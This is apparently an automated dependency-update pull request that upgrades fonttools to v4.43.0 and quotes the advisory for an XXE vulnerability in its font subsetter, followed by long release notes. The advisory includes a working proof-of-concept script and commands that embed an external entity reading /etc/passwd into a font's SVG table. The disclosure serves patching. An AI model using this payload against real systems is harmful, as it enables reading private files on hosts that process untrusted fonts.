Update dependency fonttools to v4.43.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
fonttools	==4.37.4 -> ==4.43.0

GitHub Vulnerability Alerts

CVE-2023-45139

Summary

As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the bellow steps on a unix based system.

1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.

from string import ascii_letters
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
from fontTools.ttLib import newTable

XXE_SVG = """\
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <g id="glyph1">
    <text font-size="10" x="0" y="10">&test;</text>
  </g>
</svg>
"""

def main():
    # generate a random TTF font with an SVG table
    glyph_order = [".notdef"] + list(ascii_letters)
    pen = TTGlyphPen(glyphSet=None)
    pen.moveTo((0, 0))
    pen.lineTo((0, 500))
    pen.lineTo((500, 500))
    pen.lineTo((500, 0))
    pen.closePath()
    glyph = pen.glyph()
    glyphs = {g: glyph for g in glyph_order}

    fb = FontBuilder(unitsPerEm=1024, isTTF=True)
    fb.setupGlyphOrder(glyph_order)
    fb.setupCharacterMap({ord(c): c for c in ascii_letters})
    fb.setupGlyf(glyphs)
    fb.setupHorizontalMetrics({g: (500, 0) for g in glyph_order})
    fb.setupHorizontalHeader()
    fb.setupOS2()
    fb.setupPost()
    fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

    svg_table = newTable("SVG ")
    svg_table.docList = [
       (XXE_SVG, 1, 12)
    ]
    fb.font["SVG "] = svg_table

    fb.font.save('poc-payload.ttf')

if __name__ == '__main__':
    main()

2. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):

pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="*" --ignore-missing-glyphs

3. Read the parsed SVG table in the subsetted font:

ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

Observed the included contents of the /etc/passwd file.

Impact

Note the final severity is dependant on the environment fontTools is running in.

• The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

1. Set the resolve_entities=False flag on parsing methods
2. Consider further methods of disallowing doctype declarations
3. Consider recursive regex matching

---

Release Notes

fonttools/fonttools (fonttools)

v4.43.0

Compare Source

• [subset] Set up lxml XMLParser(resolve_entities=False) when parsing OT-SVG documents to prevent XML External Entity (XXE) attacks (9f61271): https://codeql.github.com/codeql-query-help/python/py-xxe/
• [varLib.iup] Added workaround for a Cython bug in iup_delta_optimize that was leading to IUP tolerance being incorrectly initialised, resulting in sub-optimal deltas (6012643, cython/cython#5732).
• [varLib] Added new command-line entry point fonttools varLib.avar to add an avar table to an existing VF from axes mappings in a .designspace file (0a3360e).
• [instancer] Fixed bug whereby no longer used variation regions were not correctly pruned after VarData optimization (#​3268).
• Added support for Python 3.12 (#​3283).

v4.42.1

Compare Source

• [t1Lib] Fixed several Type 1 issues (#​3238, #​3240).
• [otBase/packer] Allow sharing tables reached by different offset sizes (#​3241, #​3236, 457f11c).
• [varLib/merger] Fix Cursive attachment merging error when all anchors are NULL (#​3248, #​3247).
• [ttLib] Fixed warning when calling addMultilingualName and ttFont parameter was not passed on to findMultilingualName (#​3253).

v4.42.0

Compare Source

• [varLib] Use sentinel value 0xFFFF to mark a glyph advance in hmtx/vmtx as non participating, allowing sparse masters to contain glyphs for variation purposes other than {H,V}VAR (#​3235).
• [varLib/cff] Treat empty glyphs in non-default masters as missing, thus not participating in CFF2 delta computation, similarly to how varLib already treats them for gvar (#​3234).
• Added varLib.avarPlanner script to deduce 'correct' avar v1 axis mappings based on glyph average weights (#​3223).

v4.41.1

Compare Source

• [subset] Fixed perf regression in v4.41.0 by making NameRecordVisitor only visit tables that do contain nameID references (#​3213, #​3214).
• [varLib.instancer] Support instancing fonts containing null ConditionSet offsets in FeatureVariationRecords (#​3211, #​3212).
• [statisticsPen] Report font glyph-average weight/width and font-wide slant.
• [fontBuilder] Fixed head.created date incorrectly set to 0 instead of the current timestamp, regression introduced in v4.40.0 (#​3210).
• [varLib.merger] Support sparse CursivePos masters (#​3209).

v4.41.0

Compare Source

• [fontBuilder] Fixed bug in setupOS2 with default panose attribute incorrectly being set to a dict instead of a Panose object (#​3201).
• [name] Added method to removeUnusedNameRecords in the user range (#​3185).
• [varLib.instancer] Fixed issue with L4 instancing (moving default) (#​3179).
• [cffLib] Use latin1 so we can roundtrip non-ASCII in {Full,Font,Family}Name (#​3202).
• [designspaceLib] Mark as optional in docs (as it is in the code).
• [glyf-1] Fixed drawPoints() bug whereby last cubic segment becomes quadratic (#​3189, #​3190).
• [fontBuilder] Propagate the 'hidden' flag to the fvar Axis instance (#​3184).
• [fontBuilder] Update setupAvar() to also support avar 2, fixing _add_avar() call site (#​3183).
• Added new voltLib.voltToFea submodule (originally Tiro Typeworks' "Volto") for converting VOLT OpenType Layout sources to FEA format (#​3164).

v4.40.0

Compare Source

• Published native binary wheels to PyPI for all the python minor versions and platform and architectures currently supported that would benefit from this. They will include precompiled Cython-accelerated modules (e.g. cu2qu) without requiring to compile them from source. The pure-python wheel and source distribution will continue to be published as always (pip will automatically chose them when no binary wheel is available for the given platform, e.g. pypy). Use pip install --no-binary=fonttools fonttools to expliclity request pip to install from the pure-python source.
• [designspaceLib|varLib] Add initial support for specifying axis mappings and build avar2 table from those (#​3123).
• [feaLib] Support variable ligature caret position (#​3130).
• [varLib|glyf] Added option to --drop-implied-oncurves; test for impliable oncurve points either before or after rounding (#​3146, #​3147, #​3155, #​3156).
• [TTGlyphPointPen] Don't error with empty contours, simply ignore them (#​3145).
• [sfnt] Fixed str vs bytes remnant of py3 transition in code dealing with de/compiling WOFF metadata (#​3129).
• [instancer-solver] Fixed bug when moving default instance with sparse masters (#​3139, #​3140).
• [feaLib] Simplify variable scalars that don’t vary (#​3132).
• [pens] Added filter pen that explicitly emits closing line when lastPt != movePt (#​3100).
• [varStore] Improve optimize algorithm and better document the algorithm (#​3124, #​3127).
  Added quantization option (#​3126).
• Added CI workflow config file for building native binary wheels (#​3121).
• [fontBuilder] Added glyphDataFormat=0 option; raise error when glyphs contain cubic outlines but glyphDataFormat was not explicitly set to 1 (#​3113, #​3119).
• [subset] Prune emptied GDEF.MarkGlyphSetsDef and remap indices; ensure GDEF is subsetted before GSUB and GPOS (#​3114, #​3118).
• [xmlReader] Fixed issue whereby DSIG table data was incorrectly parsed (#​3115, #​2614).
• [varLib/merger] Fixed merging of SinglePos with pos=0 (#​3111, #​3112).
• [feaLib] Demote "Feature has not been defined" error to a warning when building aalt and referenced feature is empty (#​3110).
• [feaLib] Dedupe multiple substitutions with classes (#​3105).

v4.39.4

Compare Source

• [varLib.interpolatable] Allow for sparse masters https://github.com/fonttools/fonttools/pull/30755)
• [merge] Handle differing default/nominalWidthX in CFF https://github.com/fonttools/fonttools/pull/30700)
• [ttLib] Add missing main.py file to ttLib package https://github.com/fonttools/fonttools/pull/30888)
• [ttx] Fix missing composite instructions in XML https://github.com/fonttools/fonttools/pull/30922)
• [ttx] Fix split tables option to work on filenames containing '%' https://github.com/fonttools/fonttools/pull/30966)
• [featureVars] Process lookups for features other than rvrn last https://github.com/fonttools/fonttools/pull/30999)
• [feaLib] Support multiple substitution with classes https://github.com/fonttools/fonttools/pull/31033)

v4.39.3

Compare Source

• [sbix] Fixed TypeError when compiling empty glyphs whose imageData is None, regression was introduced in v4.39 https://github.com/fonttools/fonttools/issues/30599).
• [ttFont] Fixed AttributeError on python <= 3.10 when opening a TTFont from a tempfile.SpooledTemporaryFile, seekable method was only added in python 3.11 (https://github.com/fonttools/fonttools/issues/3052).

v4.39.2

Compare Source

• [varLib] Fixed regression introduced in 4.39.1 whereby an incomplete 'STAT' table would be built even though a DesignSpace v5 did contain 'STAT' definitions (#​3045, #​3046).

NOTE: The 4.39.1 distribution was "yanked" from PyPI to prevent users from accidentally upgrading to it.

v4.39.1

Compare Source

• [avar2] Added experimental support for reading/writing avar version 2 as specified in this draft proposal:
  https://github.com/harfbuzz/boring-expansion-spec/blob/main/avar2.md
• [glifLib] Wrap underlying XML library exceptions with GlifLibError when parsing GLIFs, and also print the name and path of the glyph that fails to be parsed https://github.com/fonttools/fonttools/pull/30299).
• [feaLib] Consult avar for normalizing user-space values in ConditionSets and in VariableScalars https://github.com/fonttools/fonttools/pull/30422,https://github.com/fonttools/fonttools/pull/30433).
• [ttProgram] Handle string input to Program.fromAssembly() https://github.com/fonttools/fonttools/pull/30388).
• [otlLib] Added a config option to emit GPOS 7 lookups, currently disabled by default because of a macOS bug https://github.com/fonttools/fonttools/pull/30344).
• [COLRv1] Added method to automatically compute ClipBoxes https://github.com/fonttools/fonttools/pull/30277).
• [ttFont] Fixed getGlyphID to raise KeyError on missing glyphs instead of returning None. The regression was introduced in v4.27.0 https://github.com/fonttools/fonttools/pull/30322).
• [sbix] Fixed UnboundLocalError: cannot access local variable 'rawdata' https://github.com/fonttools/fonttools/pull/30311).
• [varLib] When building VF, do not overwrite a pre-existing STAT table that was built with feaLib from FEA feature file. Also, added support for building multiple VFs defined in Designspace v5 from fonttools varLib script (https://github.com/fonttools/fonttools/pull/3024).
• [mtiLib] Only add Debg table with lookup names when FONTTOOLS_LOOKUP_DEBUGGING env variable is set (https://github.com/fonttools/fonttools/pull/3023).

v4.39.0

Compare Source

• [mtiLib] Optionally add Debg debug info for MTI feature builds (#​3018).
• [ttx] Support reading input file from standard input using special - character, similar to existing -o - option to write output to standard output (#​3020).
• [cython] Prevent cython.compiled raise AttributeError if cython not installed properly (#​3017).
• [OS/2] Guard against ZeroDivisionError when calculating xAvgCharWidth in the unlikely scenario no glyph has non-zero advance (#​3015).
• [subset] Recompute xAvgCharWidth independently of --no-prune-unicode-ranges, previously the two options were involuntarily bundled together (#​3012).
• [fontBuilder] Add debug parameter to addOpenTypeFeatures method to add source debugging information to the font in the Debg private table (#​3008).
• [name] Make NameRecord __lt__ comparison not fail on Unicode encoding errors (#​3006).
• [featureVars] Fixed bug in overlayBox (#​3003, #​3005).
• [glyf] Added experimental support for cubic bezier curves in TrueType glyf table, as outlined in glyf v1 proposal (#​2988):
  https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-cubicOutlines.md
• Added new qu2cu module and related qu2cuPen, the reverse of cu2qu for converting TrueType quadratic splines to cubic bezier curves (#​2993).
• [glyf] Added experimental support for reading and writing Variable Composites/Components as defined in glyf v1 spec proposal (#​2958):
  https://github.com/harfbuzz/boring-expansion-spec/blob/main/glyf1-varComposites.md.
• [pens]: Added addVarComponent method to pen protocols' base classes, which pens can implement to handle varcomponents (by default they get decomposed).
• [misc.transform] Added DecomposedTransform class which implements an affine transformation with separate translate, rotation, scale, skew, and transformation-center components (#​2598)
• [sbix] Ensure Glyph.referenceGlyphName is set; fixes error after dumping and re-compiling sbix table with 'dupe' glyphs (#​2984).
• [feaLib] Be cleverer when merging chained single substitutions into same lookup when they are specified using the inline notation (#​2150, #​2974).
• [instancer] Clamp user-inputted axis ranges to those of fvar (#​2959).
• [otBase/subset] Define __getstate__ for BaseTable so that a copied/pickled 'lazy' object gets its own OTTableReader to read from; incidentally fixes a bug while subsetting COLRv1 table containing ClipBoxes on python 3.11 (#​2965, #​2968).
• [sbix] Handle glyphs with "dupe" graphic type on compile correctly (#​2963).
• [glyf] endPointsOfContours field should be unsigned! Kudos to behdad for spotting one of the oldest bugs in FT. Probably nobody has ever dared to make glyphs with more than 32767 points... (#​2957).
• [feaLib] Fixed handling of ignore statements with unmarked glyphs to match makeotf behavior, which assumes the first glyph is marked (#​2950).
• Reformatted code with black and enforce new code style via CI check (#​2925).
• [feaLib] Sort name table entries following OT spec prescribed order in the builder (#​2927).
• [cu2quPen] Add Cu2QuMultiPen that converts multiple outlines at a time in interpolation compatible way; its methods take a list of tuples arguments that would normally be passed to individual segment pens, and at the end it dispatches the converted outlines to each pen (#​2912).
• [reverseContourPen/ttGlyphPen] Add outputImpliedClosingLine option (#​2913, #​2914, #​2921, #​2922, #​2995).
• [gvar] Avoid expanding all glyphs unnecessarily upon compile (#​2918).
• [scaleUpem] Fixed bug whereby CFF2 vsindex was scaled; it should not (#​2893, #​2894).
• [designspaceLib] Add DS.getAxisByTag and refactor getAxis (#​2891).
• [unicodedata] map Zmth<->math in ot_tag_{to,from}_script (#​1737, #​2889).
• [woff2] Support encoding/decoding OVERLAP_SIMPLE glyf flags (#​2576, #​2884).
• [instancer] Update OS/2 class and post.italicAngle when default moved (L4)
• Dropped support for Python 3.7 which reached EOL, fontTools requires 3.8+.
• [instancer] Fixed instantiateFeatureVariations logic when a rule range becomes default-applicable (#​2737, #​2880).
• [ttLib] Add main to ttFont and ttCollection that just decompile and re-compile the input font (#​2869).
• [featureVars] Insert 'rvrn' lookup at the beginning of LookupList, to work around bug in Apple implementation of 'rvrn' feature which the spec says it should be processed early whereas on macOS 10.15 it follows lookup order (#​2140, #​2867).
• [instancer/mutator] Remove 'DSIG' table if present.
• [svgPathPen] Don't close path in endPath(), assume open unless closePath() (#​2089, #​2865).

v4.38.0

Compare Source

• [varLib.instancer] Added support for L4 instancing, i.e. moving the default value of an axis while keeping it variable. Thanks Behdad! (#​2728, #​2861).
  It's now also possible to restrict an axis min/max values beyond the current default value, e.g. a font wght has min=100, def=400, max=900 and you want a partial VF that only varies between 500 and 700, you can now do that. You can either specify two min/max values (wght=500:700), and the new default will be set to either the minimum or maximum, depending on which one is closer to the current default (e.g. 500 in this case). Or you can specify three values (e.g. wght=500:600:700) to set the new default value explicitly.
• [otlLib/featureVars] Set a few Count values so one doesn't need to compile the font to update them (#​2860).
• [varLib.models] Make extrapolation work for 2-master models as well where one master is at the default location (#​2843, #​2846).
  Add optional extrapolate=False to normalizeLocation() (#​2847, #​2849).
• [varLib.cff] Fixed sub-optimal packing of CFF2 deltas by no longer rounding them to integer (#​2838).
• [scaleUpem] Calculate numShorts in VarData after scale; handle CFF hintmasks (#​2840).

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.

[renovate]

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (==4.43.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.